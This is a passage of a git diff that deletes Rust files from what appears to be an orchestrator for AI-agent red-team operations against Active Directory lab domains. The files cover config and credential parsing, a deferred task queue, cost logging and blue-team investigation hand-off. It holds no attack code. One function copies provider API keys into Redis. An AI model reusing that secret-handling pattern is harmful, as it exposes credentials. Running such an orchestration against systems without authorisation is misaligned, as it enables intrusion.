tokio::time::Instant::now() >= blue_deadline { - warn!("Blue team wait deadline reached (45m) — proceeding with shutdown"); - break; - } - - let active: i64 = redis::cmd("SCARD") - .arg(ares_core::state::BLUE_ACTIVE_INVESTIGATIONS) - .query_async(&mut conn) - .await - .unwrap_or(0); - let queued: i64 = redis::cmd("LLEN") - .arg("ares:blue:investigations") - .query_async(&mut conn) - .await - .unwrap_or(0); - - if active == 0 && queued == 0 { - info!("All blue investigations finished"); - break; - } - - info!( - active_investigations = active, - queued_investigations = queued, - "Waiting for blue team to finish..." - ); - - tokio::select! { - _ = tokio::time::sleep(Duration::from_secs(10)) => {} - _ = shutdown_rx.changed() => { - if *shutdown_rx.borrow() { - break; - } - } - } - } - } - - // Signal the main loop to stop via Redis so it breaks out of its - // select! within the next 5-second poll cycle. - { - let mut conn = dispatcher.queue.connection(); - if let Err(e) = ares_core::state::request_stop_operation( - &mut conn, - &dispatcher.config.operation_id, - ) - .await - { - warn!(err = %e, "Failed to set Redis stop signal from completion monitor"); - } - } - - // Extend the lock one final time before returning - if let Err(e) = dispatcher.extend_lock().await { - warn!(err = %e, "Failed to extend lock during completion"); - } - - return; - } - - // Sleep until next check or shutdown - tokio::select! { - _ = tokio::time::sleep(interval) => {} - _ = shutdown_rx.changed() => { - if *shutdown_rx.borrow() { - info!("Completion monitor interrupted by shutdown"); - return; - } - } - } - } -} - -/// Auto-submit a blue team investigation from the current red team operation state. -/// -/// Mirrors the logic in `ares-cli/src/blue/submit.rs::blue_from_operation()` but -/// runs inline within the orchestrator process so blue always gets at least one -/// investigation even when the red operation completes before blue's first poll. -async fn auto_submit_blue_investigation( - state: &SharedState, - dispatcher: &Arc, - conn: &mut redis::aio::ConnectionManager, -) -> Result<(), anyhow::Error> { - let op_id = &dispatcher.config.operation_id; - let now = Utc::now(); - let inv_id = format!("inv-{}", now.format("%Y%m%d-%H%M%S")); - - // Read state snapshot for building the synthetic alert - let (target_domain, target_env, cred_count, host_count, vuln_count, has_da, target_ips) = { - let inner = state.read().await; - let domain = inner - .target - .as_ref() - .map(|t| t.domain.clone()) - .unwrap_or_default(); - let env = inner - .target - .as_ref() - .map(|t| t.environment.clone()) - .unwrap_or_default(); - let ips: Vec = inner.hosts.iter().map(|h| h.ip.clone()).collect(); - ( - domain, - env, - inner.credentials.len(), - inner.hosts.len(), - inner.discovered_vulnerabilities.len(), - inner.has_domain_admin, - ips, - ) - }; - - // Collect attack techniques from Redis - let techniques_key = format!("ares:op:{op_id}:techniques"); - let techniques: Vec = redis::cmd("SMEMBERS") - .arg(&techniques_key) - .query_async(conn) - .await - .unwrap_or_default(); - - let operation_context = serde_json::json!({ - "operation_id": op_id, - "attack_window_start": now.to_rfc3339(), - "attack_window_end": now.to_rfc3339(), - "techniques_used": &techniques[..std::cmp::min(techniques.len(), 20)], - "deployment": target_env, - }); - - let alert = serde_json::json!({ - "labels": { - "alertname": format!("RedTeamOperation_{}", op_id), - "severity": "critical", - "source": "ares-red-team", - "deployment": target_env, - }, - "annotations": { - "summary": format!( - "Red team operation {op_id} - {cred_count} credentials, {host_count} hosts, {vuln_count} vulnerabilities", - ), - "description": format!( - "Investigate blue team detection coverage for red team operation {op_id}. \ - Domain: {target_domain}. Domain admin: {has_da}.", - ), - }, - "operation_context": operation_context, - "startsAt": now.to_rfc3339(), - "endsAt": now.to_rfc3339(), - "target_ips": &target_ips[..std::cmp::min(target_ips.len(), 50)], - }); - - // Resolve model from env (same precedence as CLI) - let model = std::env::var("ARES_BLUE_LLM_MODEL") - .ok() - .filter(|s| !s.is_empty()) - .or_else(|| std::env::var("ARES_MODEL_OVERRIDE").ok()) - .or_else(|| std::env::var("ARES_ORCHESTRATOR_MODEL").ok()) - .or_else(|| std::env::var("ARES_MODEL").ok()); - - let grafana_url = std::env::var("GRAFANA_URL").ok(); - let grafana_api_key = std::env::var("GRAFANA_SERVICE_ACCOUNT_TOKEN").ok(); - - let max_steps: u32 = std::env::var("ARES_BLUE_MAX_STEPS") - .ok() - .and_then(|s| s.parse().ok()) - .unwrap_or(75); - - let request = serde_json::json!({ - "investigation_id": inv_id, - "alert": alert, - "correlation_context": null, - "model": model, - "max_steps": max_steps, - "multi_agent": true, - "auto_route": false, - "report_dir": null, - "grafana_url": grafana_url, - "grafana_api_key": grafana_api_key, - "submitted_at": now.to_rfc3339(), - }); - - // Store env vars for the blue runner (Grafana token, API keys) - let env_vars: std::collections::HashMap = [ - "ANTHROPIC_API_KEY", - "OPENAI_API_KEY", - "GRAFANA_SERVICE_ACCOUNT_TOKEN", - "GRAFANA_URL", - ] - .iter() - .filter_map(|&key| std::env::var(key).ok().map(|v| (key.to_string(), v))) - .collect(); - - if !env_vars.is_empty() { - let env_vars_key = format!("ares:blue:inv:{inv_id}:env_vars"); - let env_json = serde_json::to_string(&env_vars)?; - let _: () = conn.set(&env_vars_key, &env_json).await?; - let _: () = conn.expire(&env_vars_key, 3600).await?; - } - - // Pre-register as active BEFORE pushing to queue to avoid TOCTOU race: - // without this, the completion wait loop can observe both queued==0 and - // active==0 in the window between the blue orchestrator's BRPOP (drains - // the queue) and its register_investigation (SADDs to active set). - let _: () = conn - .sadd(ares_core::state::BLUE_ACTIVE_INVESTIGATIONS, &inv_id) - .await?; - let _: () = conn - .expire(ares_core::state::BLUE_ACTIVE_INVESTIGATIONS, 86400) - .await?; - - // Push investigation request to queue - let request_json = serde_json::to_string(&request)?; - let _: () = conn - .rpush("ares:blue:investigations", &request_json) - .await?; - - // Track investigation against operation - let op_inv_key = format!("ares:blue:op:{op_id}:investigations"); - let _: () = conn.sadd(&op_inv_key, &inv_id).await?; - let _: () = conn.expire(&op_inv_key, 7 * 24 * 3600).await?; - - info!( - investigation_id = inv_id, - operation_id = op_id, - "Auto-submitted blue investigation from operation state" - ); - - Ok(()) -} - -#[cfg(test)] -mod tests { - use super::*; - - #[test] - fn test_forest_root_of_simple() { - assert_eq!(forest_root_of("contoso.local"), "contoso.local"); - } - - #[test] - fn test_forest_root_of_child() { - assert_eq!(forest_root_of("north.contoso.local"), "contoso.local"); - } - - #[test] - fn test_forest_root_of_deep_child() { - assert_eq!(forest_root_of("sub.north.contoso.local"), "contoso.local"); - } -} diff --git a/ares-orchestrator/src/config.rs b/ares-orchestrator/src/config.rs deleted file mode 100644 index fcaefb39..00000000 --- a/ares-orchestrator/src/config.rs +++ /dev/null @@ -1,365 +0,0 @@ -//! Configuration loaded from environment variables. -//! -//! Mirrors the Python `ares.core.config` module. Every knob exposed to the -//! Python orchestrator is also configurable here so the Rust binary is a -//! drop-in replacement. - -use std::env; -use std::time::Duration; - -/// All tunables for the orchestrator, loaded once at startup. -#[derive(Debug, Clone)] -#[allow(dead_code)] -pub struct OrchestratorConfig { - /// Redis connection URL (supports `redis://` and `redis+sentinel://`). - pub redis_url: String, - - /// Operation ID this orchestrator instance manages. - pub operation_id: String, - - /// Maximum number of concurrent LLM-consuming tasks across all roles. - pub max_concurrent_tasks: usize, - - /// Interval between heartbeat sweeps. - pub heartbeat_interval: Duration, - - /// How long before an agent with no heartbeat is considered dead. - pub heartbeat_timeout: Duration, - - /// How often the result consumer polls Redis for completed tasks. - pub result_poll_interval: Duration, - - /// TTL for the operation lock key (`ares:lock:{op_id}`). - pub lock_ttl: Duration, - - /// How often the deferred-queue processor wakes up. - pub deferred_poll_interval: Duration, - - /// Maximum number of tasks a single role can have in-flight. - pub max_tasks_per_role: usize, - - /// Global rate-limit: minimum delay between consecutive task dispatches. - pub dispatch_delay: Duration, - - /// How long before an in-progress task with no activity is considered stale. - pub stale_task_timeout: Duration, - - /// Maximum age for deferred tasks before eviction (seconds). - pub deferred_task_max_age: Duration, - - /// Maximum number of deferred tasks per task type. - pub max_deferred_per_type: usize, - - /// Maximum total deferred tasks across all types. - pub max_deferred_total: usize, - - /// Target domain for the operation (e.g. "contoso.local"). - pub target_domain: String, - - /// Target IPs for the operation (comma-separated in env, parsed to vec). - pub target_ips: Vec, - - /// Initial credential to seed at startup (optional). - /// Format: `user:pass@domain` or from JSON payload. - pub initial_credential: Option, -} - -/// A credential provided at operation launch time. -#[derive(Debug, Clone)] -pub struct InitialCredential { - pub username: String, - pub password: String, - pub domain: String, -} - -impl OrchestratorConfig { - /// Load configuration from environment variables with sensible defaults. - pub fn from_env() -> anyhow::Result { - let redis_url = - env::var("ARES_REDIS_URL").unwrap_or_else(|_| "redis://127.0.0.1:6379/0".to_string()); - - let raw_op = env::var("ARES_OPERATION_ID") - .map_err(|_| anyhow::anyhow!("ARES_OPERATION_ID is required"))?; - - // ARES_OPERATION_ID may be a plain operation-id string OR a full JSON - // payload (the queue dispatcher passes the entire operation request JSON). - let (operation_id, target_domain, target_ips, json_cred) = if raw_op.starts_with('{') { - let v: serde_json::Value = serde_json::from_str(&raw_op) - .map_err(|e| anyhow::anyhow!("Failed to parse ARES_OPERATION_ID JSON: {e}"))?; - let op_id = v["operation_id"] - .as_str() - .ok_or_else(|| anyhow::anyhow!("Missing operation_id in JSON payload"))? - .to_string(); - let domain = v["target_domain"].as_str().unwrap_or("").to_string(); - let ips: Vec = v["target_ips"] - .as_array() - .map(|arr| { - arr.iter() - .filter_map(|v| v.as_str().map(|s| s.to_string())) - .collect() - }) - .unwrap_or_default(); - // Extract initial credential from JSON payload. - // Python sends a nested object: {"initial_credential": {"username": ..., "password": ..., "domain": ...}} - // Also support flat fields for backwards compatibility: {"initial_username": ..., "initial_password": ...} - let cred = if let Some(ic) = v.get("initial_credential").and_then(|v| v.as_object()) { - match ( - ic.get("username").and_then(|v| v.as_str()), - ic.get("password").and_then(|v| v.as_str()), - ) { - (Some(user), Some(pass)) => Some(InitialCredential { - username: user.to_string(), - password: pass.to_string(), - domain: ic - .get("domain") - .and_then(|v| v.as_str()) - .unwrap_or(&domain) - .to_string(), - }), - _ => None, - } - } else { - // Flat field fallback - match ( - v["initial_username"].as_str(), - v["initial_password"].as_str(), - ) { - (Some(user), Some(pass)) => Some(InitialCredential { - username: user.to_string(), - password: pass.to_string(), - domain: v["initial_domain"].as_str().unwrap_or(&domain).to_string(), - }), - _ => None, - } - }; - (op_id, domain, ips, cred) - } else { - // Plain operation ID — read target info from separate env vars - let domain = env::var("ARES_TARGET_DOMAIN").unwrap_or_default(); - let ips: Vec = env::var("ARES_TARGET_IPS") - .unwrap_or_default() - .split(',') - .map(|s| s.trim().to_string()) - .filter(|s| !s.is_empty()) - .collect(); - (raw_op, domain, ips, None) - }; - - // Initial credential: JSON payload takes precedence, then env var. - // Format: user:pass@domain - let initial_credential = json_cred.or_else(|| { - env::var("ARES_INITIAL_CREDENTIAL") - .ok() - .and_then(|raw| parse_credential_spec(&raw, &target_domain)) - }); - - let max_concurrent_tasks = parse_env("ARES_MAX_CONCURRENT_TASKS", 8); - let heartbeat_interval_secs = parse_env("ARES_HEARTBEAT_INTERVAL_SECS", 30); - let heartbeat_timeout_secs = parse_env("ARES_HEARTBEAT_TIMEOUT_SECS", 120); - let result_poll_interval_ms = parse_env("ARES_RESULT_POLL_INTERVAL_MS", 500); - let lock_ttl_secs = parse_env("ARES_LOCK_TTL_SECS", 300); - let deferred_poll_interval_secs = parse_env("ARES_DEFERRED_POLL_INTERVAL_SECS", 10); - let max_tasks_per_role = parse_env("ARES_MAX_TASKS_PER_ROLE", 3); - let dispatch_delay_ms = parse_env("ARES_DISPATCH_DELAY_MS", 200); - let stale_task_timeout_secs = parse_env("ARES_STALE_TASK_TIMEOUT_SECS", 900); - let deferred_task_max_age_secs = parse_env("ARES_DEFERRED_TASK_MAX_AGE_SECS", 300); - let max_deferred_per_type = parse_env("ARES_MAX_DEFERRED_PER_TYPE", 50); - let max_deferred_total = parse_env("ARES_MAX_DEFERRED_TOTAL", 200); - - Ok(Self { - redis_url, - operation_id, - max_concurrent_tasks, - heartbeat_interval: Duration::from_secs(heartbeat_interval_secs), - heartbeat_timeout: Duration::from_secs(heartbeat_timeout_secs), - result_poll_interval: Duration::from_millis(result_poll_interval_ms), - lock_ttl: Duration::from_secs(lock_ttl_secs), - deferred_poll_interval: Duration::from_secs(deferred_poll_interval_secs), - max_tasks_per_role, - dispatch_delay: Duration::from_millis(dispatch_delay_ms), - stale_task_timeout: Duration::from_secs(stale_task_timeout_secs), - deferred_task_max_age: Duration::from_secs(deferred_task_max_age_secs), - max_deferred_per_type, - max_deferred_total, - target_domain, - target_ips, - initial_credential, - }) - } - - /// Hard cap = 1.5x the soft concurrency limit. Tasks above this are deferred. - pub fn hard_cap(&self) -> usize { - (self.max_concurrent_tasks as f64 * 1.5) as usize - } -} - -/// Parse a credential spec in `user:pass@domain` format. -/// If no `@domain` is given, falls back to `default_domain`. -/// -/// The `@` that separates password from domain must look like a domain -/// (contains a dot). This avoids misinterpreting `@` characters within -/// passwords (e.g., `admin:P@ssw0rd` stays intact). -fn parse_credential_spec(spec: &str, default_domain: &str) -> Option { - let colon_pos = spec.find(':')?; - let username = &spec[..colon_pos]; - let rest = &spec[colon_pos + 1..]; // password[@domain] - - // Only treat text after the last '@' as a domain if it contains a dot, - // to avoid misinterpreting '@' in passwords (e.g. P@ssw0rd). - let (password, domain) = if let Some(at_pos) = rest.rfind('@') { - let candidate = &rest[at_pos + 1..]; - if candidate.contains('.') { - (&rest[..at_pos], candidate) - } else { - (rest, default_domain) - } - } else { - (rest, default_domain) - }; - - if username.is_empty() || password.is_empty() { - return None; - } - Some(InitialCredential { - username: username.to_string(), - password: password.to_string(), - domain: domain.to_string(), - }) -} - -/// Parse an environment variable into a numeric type, falling back to `default`. -fn parse_env(key: &str, default: T) -> T { - env::var(key) - .ok() - .and_then(|v| v.parse().ok()) - .unwrap_or(default) -} - -#[cfg(test)] -mod tests { - use super::*; - - /// Helper to create a config without env vars. - pub(crate) fn make_config(max_tasks: usize) -> OrchestratorConfig { - OrchestratorConfig { - redis_url: "redis://localhost".into(), - operation_id: "test-op".into(), - max_concurrent_tasks: max_tasks, - heartbeat_interval: Duration::from_secs(30), - heartbeat_timeout: Duration::from_secs(120), - result_poll_interval: Duration::from_millis(500), - lock_ttl: Duration::from_secs(300), - deferred_poll_interval: Duration::from_secs(10), - max_tasks_per_role: 3, - dispatch_delay: Duration::from_millis(0), - stale_task_timeout: Duration::from_secs(900), - deferred_task_max_age: Duration::from_secs(300), - max_deferred_per_type: 50, - max_deferred_total: 200, - target_domain: String::new(), - target_ips: Vec::new(), - initial_credential: None, - } - } - - #[test] - fn hard_cap_is_1_5x() { - assert_eq!(make_config(8).hard_cap(), 12); - assert_eq!(make_config(10).hard_cap(), 15); - assert_eq!(make_config(1).hard_cap(), 1); - } - - #[test] - fn from_env_plain_and_json_and_missing() { - // Single test to avoid env var race conditions between parallel tests. - std::env::remove_var("ARES_INITIAL_CREDENTIAL"); - - // Missing → error - std::env::remove_var("ARES_OPERATION_ID"); - assert!(OrchestratorConfig::from_env().is_err()); - - // Plain string → operation_id, empty targets - std::env::set_var("ARES_OPERATION_ID", "test-op-1"); - let c = OrchestratorConfig::from_env().unwrap(); - assert_eq!(c.operation_id, "test-op-1"); - assert_eq!(c.max_concurrent_tasks, 8); - assert_eq!(c.heartbeat_interval, Duration::from_secs(30)); - assert!(c.target_ips.is_empty()); - assert!(c.initial_credential.is_none()); - - // JSON payload → parsed operation_id, target_domain, target_ips - let payload = r#"{"operation_id":"op-json-test","target_domain":"contoso.local","target_ips":["192.168.58.1","192.168.58.2"],"model":"gpt-4"}"#; - std::env::set_var("ARES_OPERATION_ID", payload); - let c = OrchestratorConfig::from_env().unwrap(); - assert_eq!(c.operation_id, "op-json-test"); - assert_eq!(c.target_domain, "contoso.local"); - assert_eq!(c.target_ips, vec!["192.168.58.1", "192.168.58.2"]); - - // JSON payload with nested initial_credential (Python format) - let payload = r#"{"operation_id":"op-cred","target_domain":"contoso.local","target_ips":[],"initial_credential":{"username":"admin","password":"Pass123","domain":"contoso.local"}}"#; - std::env::set_var("ARES_OPERATION_ID", payload); - let c = OrchestratorConfig::from_env().unwrap(); - let cred = c.initial_credential.unwrap(); - assert_eq!(cred.username, "admin"); - assert_eq!(cred.password, "Pass123"); - assert_eq!(cred.domain, "contoso.local"); - - // JSON payload with flat initial credential (backwards compat) - let payload = r#"{"operation_id":"op-cred2","target_domain":"contoso.local","target_ips":[],"initial_username":"admin2","initial_password":"Pass456"}"#; - std::env::set_var("ARES_OPERATION_ID", payload); - let c = OrchestratorConfig::from_env().unwrap(); - let cred = c.initial_credential.unwrap(); - assert_eq!(cred.username, "admin2"); - assert_eq!(cred.password, "Pass456"); - assert_eq!(cred.domain, "contoso.local"); - - // Env var credential (ARES_INITIAL_CREDENTIAL) - std::env::set_var("ARES_OPERATION_ID", "test-op-2"); - std::env::set_var("ARES_INITIAL_CREDENTIAL", "user1:secret@fabrikam.local"); - let c = OrchestratorConfig::from_env().unwrap(); - let cred = c.initial_credential.unwrap(); - assert_eq!(cred.username, "user1"); - assert_eq!(cred.password, "secret"); - assert_eq!(cred.domain, "fabrikam.local"); - - std::env::remove_var("ARES_OPERATION_ID"); - std::env::remove_var("ARES_INITIAL_CREDENTIAL"); - } - - #[test] - fn parse_credential_spec_full() { - let cred = parse_credential_spec("admin:P@ssw0rd@contoso.local", "").unwrap(); - assert_eq!(cred.username, "admin"); - assert_eq!(cred.password, "P@ssw0rd"); - assert_eq!(cred.domain, "contoso.local"); - } - - #[test] - fn parse_credential_spec_no_domain() { - let cred = parse_credential_spec("admin:P@ssw0rd", "fallback.local").unwrap(); - assert_eq!(cred.username, "admin"); - assert_eq!(cred.password, "P@ssw0rd"); - assert_eq!(cred.domain, "fallback.local"); - } - - #[test] - fn parse_credential_spec_at_in_password() { - // rfind('@') splits at the last @, so user:p@ss@domain works - let cred = parse_credential_spec("admin:p@ss@contoso.local", "").unwrap(); - assert_eq!(cred.username, "admin"); - assert_eq!(cred.password, "p@ss"); - assert_eq!(cred.domain, "contoso.local"); - } - - #[test] - fn parse_credential_spec_invalid() { - // No colon - assert!(parse_credential_spec("admin", "").is_none()); - // Empty username - assert!(parse_credential_spec(":pass@contoso.local", "").is_none()); - // Empty password - assert!(parse_credential_spec("admin:@contoso.local", "").is_none()); - // Empty password without domain - assert!(parse_credential_spec("admin:", "").is_none()); - } -} diff --git a/ares-orchestrator/src/cost_summary.rs b/ares-orchestrator/src/cost_summary.rs deleted file mode 100644 index 893c150e..00000000 --- a/ares-orchestrator/src/cost_summary.rs +++ /dev/null @@ -1,87 +0,0 @@ -//! Periodic token usage and cost summary. -//! -//! Spawns a background task that logs aggregate token usage and estimated cost -//! every 120 seconds, matching Python's `_periodic_token_usage_summary()`. - -use std::sync::Arc; -use std::time::Duration; - -use tokio::sync::watch; -use tokio::task::JoinHandle; -use tracing::{debug, info}; - -use ares_core::token_usage::{estimate_usage_cost, get_token_usage}; - -use crate::config::OrchestratorConfig; -use crate::task_queue::TaskQueue; - -/// How often to log the cost summary. -const SUMMARY_INTERVAL: Duration = Duration::from_secs(120); - -/// Spawn the periodic cost summary background task. -pub fn spawn_cost_summary( - queue: TaskQueue, - config: Arc, - shutdown_rx: watch::Receiver, -) -> JoinHandle<()> { - tokio::spawn(cost_summary_loop(queue, config, shutdown_rx)) -} - -async fn cost_summary_loop( - queue: TaskQueue, - config: Arc, - mut shutdown_rx: watch::Receiver, -) { - let mut interval = tokio::time::interval(SUMMARY_INTERVAL); - interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); - - // Skip the first immediate tick - interval.tick().await; - - loop { - tokio::select! { - _ = interval.tick() => {} - _ = shutdown_rx.changed() => { - debug!("Cost summary: shutdown"); - return; - } - } - - if *shutdown_rx.borrow() { - return; - } - - let mut conn = queue.connection(); - match get_token_usage(&mut conn, &config.operation_id).await { - Ok(Some(usage)) => { - let in_tok = usage.input_tokens; - let out_tok = usage.output_tokens; - if in_tok == 0 && out_tok == 0 { - continue; - } - let total = in_tok + out_tok; - - let (total_cost, breakdown, _unpriced) = estimate_usage_cost(&usage); - - let cost_str = match total_cost { - Some(cost) => { - let suffix = if breakdown.len() > 1 { " blended" } else { "" }; - format!(" | ${cost:.4}{suffix}") - } - None if !usage.models.is_empty() => { - let n = usage.models.len(); - let label = if n > 1 { "models" } else { "model" }; - format!(" | cost unavailable for {n} {label}") - } - _ => String::new(), - }; - - info!("💰 [token-usage] {total} tokens (in: {in_tok} out: {out_tok}){cost_str}"); - } - Ok(None) => {} - Err(e) => { - debug!("Token usage summary failed: {e}"); - } - } - } -} diff --git a/ares-orchestrator/src/deferred.rs b/ares-orchestrator/src/deferred.rs deleted file mode 100644 index ab0d4389..00000000 --- a/ares-orchestrator/src/deferred.rs +++ /dev/null @@ -1,393 +0,0 @@ -//! Redis-backed deferred task queue. -//! -//! When the throttler decides to defer a task, it lands here in a ZSET keyed -//! by `ares:deferred:{operation_id}:{task_type}`. A background tokio task -//! periodically checks for tasks whose score (priority-weighted timestamp) -//! qualifies them for re-dispatch once concurrency slots open up. -//! -//! Score formula: `(priority * 1_000_000_000) + (unix_millis)` -//! Lower score = higher priority = processed first. - -use anyhow::{Context, Result}; -use chrono::Utc; -use redis::AsyncCommands; -use serde::{Deserialize, Serialize}; -use std::sync::Arc; -use tokio::sync::watch; -use tracing::{debug, info, warn}; - -use crate::config::OrchestratorConfig; -use crate::dispatcher::Dispatcher; -use crate::task_queue::TaskQueue; -use crate::throttling::{ThrottleDecision, Throttler}; - -/// Redis key prefix for deferred queues (matches Python `DEFERRED_QUEUE_PREFIX`). -pub const DEFERRED_QUEUE_PREFIX: &str = "ares:deferred"; - -#[derive(Debug, Clone, Serialize, Deserialize)] -pub struct DeferredTask { - pub priority: i32, - pub enqueue_time: f64, - pub task_type: String, - pub target_role: String, - pub payload: serde_json::Value, - pub source_agent: String, -} - -impl DeferredTask { - /// ZSET score: priority bucket * 1e9 + enqueue millis. - pub fn score(&self) -> f64 { - (self.priority as f64) * 1_000_000_000.0 + self.enqueue_time * 1000.0 - } -} - -/// Manages the Redis ZSET-backed deferred queue. -pub struct DeferredQueue { - queue: TaskQueue, - config: Arc, -} - -impl DeferredQueue { - pub fn new(queue: TaskQueue, config: Arc) -> Self { - Self { queue, config } - } - - /// Redis key for the per-task-type deferred ZSET. - fn zset_key(&self, task_type: &str) -> String { - format!( - "{}:{}:{}", - DEFERRED_QUEUE_PREFIX, self.config.operation_id, task_type - ) - } - - /// Enqueue a task for later dispatch. - /// - /// Returns `true` if the task was accepted, `false` if the queue is full. - pub async fn enqueue(&self, task: &DeferredTask) -> Result { - let key = self.zset_key(&task.task_type); - - // Check per-type limit - let mut conn = self.queue_conn(); - let current_len: usize = conn.zcard(&key).await.unwrap_or(0); - if current_len >= self.config.max_deferred_per_type { - debug!( - task_type = %task.task_type, - len = current_len, - max = self.config.max_deferred_per_type, - "Deferred queue full for type" - ); - return Ok(false); - } - - let json = serde_json::to_string(task).context("Failed to serialize DeferredTask")?; - let score = task.score(); - - conn.zadd::<_, _, _, ()>(&key, &json, score) - .await - .with_context(|| format!("ZADD to {key}"))?; - - info!( - task_type = %task.task_type, - role = %task.target_role, - priority = task.priority, - score, - "Task deferred" - ); - Ok(true) - } - - /// Pop the highest-priority (lowest-score) task from any type ZSET. - /// - /// Scans all known task-type keys for this operation and picks the - /// globally lowest score. - pub async fn pop_best(&self) -> Result> { - let pattern = format!("{}:{}:*", DEFERRED_QUEUE_PREFIX, self.config.operation_id); - let mut conn = self.queue_conn(); - - // SCAN for matching keys (avoids blocking Redis with KEYS) - let keys: Vec = scan_keys_async(&mut conn, &pattern).await; - - if keys.is_empty() { - return Ok(None); - } - - // Find the globally best candidate across all type ZSETs - let mut best: Option<(String, String, f64)> = None; // (key, member, score) - - for key in &keys { - // Peek at the lowest-score member - let members: Vec<(String, f64)> = redis::cmd("ZRANGEBYSCORE") - .arg(key) - .arg("-inf") - .arg("+inf") - .arg("WITHSCORES") - .arg("LIMIT") - .arg(0) - .arg(1) - .query_async(&mut conn) - .await - .unwrap_or_default(); - - if let Some((member, score)) = members.into_iter().next() { - let dominated = best.as_ref().map(|(_, _, s)| score < *s).unwrap_or(true); - if dominated { - best = Some((key.clone(), member, score)); - } - } - } - - match best { - Some((key, member, _score)) => { - // Atomically remove it - let removed: usize = conn.zrem(&key, &member).await.unwrap_or(0); - if removed == 0 { - // Someone else grabbed it (unlikely in single-orchestrator mode) - return Ok(None); - } - let task: DeferredTask = - serde_json::from_str(&member).context("Bad DeferredTask JSON")?; - Ok(Some(task)) - } - None => Ok(None), - } - } - - /// Evict tasks older than `max_age` from all deferred ZSETs. - pub async fn evict_stale(&self) -> Result { - let pattern = format!("{}:{}:*", DEFERRED_QUEUE_PREFIX, self.config.operation_id); - let mut conn = self.queue_conn(); - let keys: Vec = scan_keys_async(&mut conn, &pattern).await; - - let max_age = self.config.deferred_task_max_age; - let cutoff = Utc::now().timestamp() as f64 - max_age.as_secs_f64(); - let mut total_evicted = 0_usize; - - for key in &keys { - // All members, check enqueue_time - let members: Vec<(String, f64)> = redis::cmd("ZRANGEBYSCORE") - .arg(key) - .arg("-inf") - .arg("+inf") - .arg("WITHSCORES") - .query_async(&mut conn) - .await - .unwrap_or_default(); - - for (member, _score) in members { - if let Ok(task) = serde_json::from_str::(&member) { - if task.enqueue_time < cutoff { - let _: usize = conn.zrem(key, &member).await.unwrap_or(0); - total_evicted += 1; - debug!( - task_type = %task.task_type, - age_secs = Utc::now().timestamp() as f64 - task.enqueue_time, - "Evicted stale deferred task" - ); - } - } - } - } - - if total_evicted > 0 { - info!(evicted = total_evicted, "Deferred queue stale eviction"); - } - Ok(total_evicted) - } - - fn queue_conn(&self) -> redis::aio::ConnectionManager { - // TaskQueue wraps a ConnectionManager which implements Clone cheaply - // We access it through an internal method. - self.queue.connection() - } -} - -/// Scan Redis keys matching a pattern using cursor iteration (avoids KEYS). -async fn scan_keys_async(conn: &mut redis::aio::ConnectionManager, pattern: &str) -> Vec { - let mut all_keys = Vec::new(); - let mut cursor: u64 = 0; - loop { - let result: Result<(u64, Vec), _> = redis::cmd("SCAN") - .arg(cursor) - .arg("MATCH") - .arg(pattern) - .arg("COUNT") - .arg(100) - .query_async(conn) - .await; - match result { - Ok((next_cursor, keys)) => { - all_keys.extend(keys); - cursor = next_cursor; - if cursor == 0 { - break; - } - } - Err(_) => break, - } - } - all_keys -} - -/// Spawn a tokio task that periodically drains the deferred queue whenever -/// the throttler allows new submissions. -/// -/// Uses `Dispatcher::do_submit()` to route tasks directly to the LLM agent -/// loop (not Redis task queues, which have no consumer in this process). -pub fn spawn_deferred_processor( - deferred: Arc, - dispatcher: Arc, - throttler: Arc, - config: Arc, - mut shutdown: watch::Receiver, -) -> tokio::task::JoinHandle<()> { - tokio::spawn(async move { - let mut interval = tokio::time::interval(config.deferred_poll_interval); - - loop { - tokio::select! { - _ = interval.tick() => {}, - _ = shutdown.changed() => { - info!("Deferred processor shutting down"); - break; - } - } - - // Evict stale tasks first - if let Err(e) = deferred.evict_stale().await { - warn!(err = %e, "Deferred eviction error"); - } - - // Try to drain as many as possible while slots are open - let mut dispatched = 0_u32; - loop { - let Some(task) = (match deferred.pop_best().await { - Ok(t) => t, - Err(e) => { - warn!(err = %e, "pop_best error"); - break; - } - }) else { - break; // queue empty - }; - - // Re-check throttle before submitting - let decision = throttler - .check(&task.task_type, &task.target_role, Some(&task.payload)) - .await; - - match decision { - ThrottleDecision::Allow => { - // Pre-check credential concurrency to avoid a hot - // re-enqueue loop: submit_to_llm would re-defer the - // task if the credential is at capacity, but this - // drain loop would immediately pop it again. - if let Some(cred_key) = - crate::dispatcher::credential_key_from_payload(&task.payload) - { - if !dispatcher.credential_inflight.can_acquire(&cred_key).await { - let _ = deferred.enqueue(&task).await; - break; - } - } - - // Route directly to the LLM agent loop via Dispatcher. - // do_submit handles tracker.add() and throttler.record_dispatch(). - match dispatcher - .do_submit( - &task.task_type, - &task.target_role, - task.payload.clone(), - task.priority, - ) - .await - { - Ok(Some(tid)) => { - dispatched += 1; - info!( - task_id = %tid, - task_type = %task.task_type, - "Deferred task dispatched" - ); - } - Ok(None) => { - // Credential concurrency block or no role mapping. - // Task may have been re-enqueued by submit_to_llm; - // break to avoid hot loop. - break; - } - Err(e) => { - warn!(err = %e, "Failed to dispatch deferred task"); - // Re-enqueue so it is not lost - let _ = deferred.enqueue(&task).await; - break; - } - } - } - ThrottleDecision::Defer | ThrottleDecision::Wait(_) => { - // Put it back; stop draining since capacity is full. - let _ = deferred.enqueue(&task).await; - break; - } - } - } - - if dispatched > 0 { - info!(dispatched, "Deferred queue drain cycle"); - } - } - }) -} - -#[cfg(test)] -mod tests { - use super::*; - - fn make_task(priority: i32, enqueue_time: f64) -> DeferredTask { - DeferredTask { - priority, - enqueue_time, - task_type: "recon".into(), - target_role: "recon".into(), - payload: serde_json::json!({}), - source_agent: "orchestrator".into(), - } - } - - #[test] - fn higher_priority_lower_score() { - let high = make_task(1, 1000.0); - let low = make_task(5, 1000.0); - assert!(high.score() < low.score()); - } - - #[test] - fn same_priority_fifo_ordering() { - let earlier = make_task(5, 1000.0); - let later = make_task(5, 1010.0); - assert!(earlier.score() < later.score()); - } - - #[test] - fn score_deterministic() { - let t = make_task(3, 1700000000.0); - assert_eq!(t.score(), t.score()); - } - - #[test] - fn priority_dominates_time_within_bucket() { - // With small time deltas (< 1s apart), priority bucket dominates - let p1_late = make_task(1, 100.010); - let p5_early = make_task(5, 100.000); - assert!(p1_late.score() < p5_early.score()); - } - - #[test] - fn deferred_task_roundtrip() { - let t = make_task(3, 1700000000.0); - let json = serde_json::to_string(&t).unwrap(); - let t2: DeferredTask = serde_json::from_str(&json).unwrap(); - assert_eq!(t.priority, t2.priority); - assert_eq!(t.task_type, t2.task_type); - assert!((t.enqueue_time - 